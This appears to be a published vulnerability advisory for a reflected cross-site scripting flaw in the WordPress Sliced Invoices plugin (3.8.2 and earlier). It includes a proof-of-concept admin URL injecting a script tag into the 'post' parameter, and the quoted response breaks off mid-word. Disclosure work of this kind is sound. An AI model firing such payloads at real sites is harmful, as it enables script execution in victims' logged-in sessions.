WordPress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS

2019.10.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WordPress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / WordPress 5.3

1. Description:

The WordPress Sliced Invoices plugin, version 3.8.2 and earlier, is affected by an authenticated reflected cross-site scripting (XSS) vulnerability: the value of the `post` parameter of the `duplicate_quote_invoice` admin action is reflected into the response without output encoding, so an attacker who can get a logged-in user to open a crafted link executes script in that user's session.

2. Proof of Concept:

Reflected cross-site scripting (XSS)

- Logged in as a WordPress user, access:

  <your_target>/wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E

- The response will contain:

```
<body id="error-page"> <p>Cre
```

References:

https://nitesculucian.github.io/2019/10/22/sliced-invoices-3-8-2-authentificated-reflected-xss-vulnerability/

